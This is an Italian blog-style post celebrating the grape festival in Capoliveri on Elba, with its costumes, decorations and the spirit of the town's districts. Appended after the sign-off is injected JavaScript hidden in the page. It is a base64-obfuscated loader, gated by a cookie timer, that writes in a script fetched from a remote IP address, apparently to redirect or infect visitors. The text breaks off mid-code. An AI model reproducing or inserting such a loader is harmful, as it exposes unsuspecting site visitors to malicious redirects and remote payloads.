Che dire ?! Anche questa Festa dell’uva è stata sorprendente. Anno dopo anno l’allegria, la gioia, la cura che l’intero paese mette nel preparare questo avvenimento lo rendono uno tra i più attesi dell’autunno elbano.
19 edizioni ma lo stesso entusiasmo della prima volta, Capoliveri riesce a sorprenderti ogni anno. Ti trascina con la sua la musica e i suoi colori. Ti porta dentro quelle scene d’altri tempi , immergendoti in un’atmosfera di giubilio e allegria.
Quello che colpisce di più è la passione dei partecipanti che donano un po’ di loro stessi, del loro buonumore e del loro saper fare. Ed è questo che secondo me che la fa differenza. La cura nel preparare ogni dettaglio: l’uva e la paglia per le strade, gli ombrelli colorati, l’impasto per il pane fresco e i frati caldi.
Nulla viene lasciato al caso: i copricapo, i colletti delle camice rigorosamente “come andavano una volta”, i bambini vestiti a festa.
Parlando con chi ha partecipato attivamente all’evento , preparando le vie, allestendo i banchi o recitando come figurante scopro che in realtà il sentimento più sentito non è la competetizione tra i rioni, come si potrebbe erroneamente pensare.
Ciò che più anima queste persone è lo spirito di gruppo e la collaborazione per condividere poi l’eventuale vincita.
La cordialità, la gentilezza e il mettere tutti a proprio agio sono gli intenti più sentiti dai Capoliveresi, che invitano tutti a partecipare alla festa, lasciando spazio anche agli altri e facendoli sentire un po’ come una grande famiglia. L’impegno e la passione guidano tutti i rioni. per questo l’allegria e la collaborazione sono assicurate! Quindi #elbauva arriverderci al prossimo anno! _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘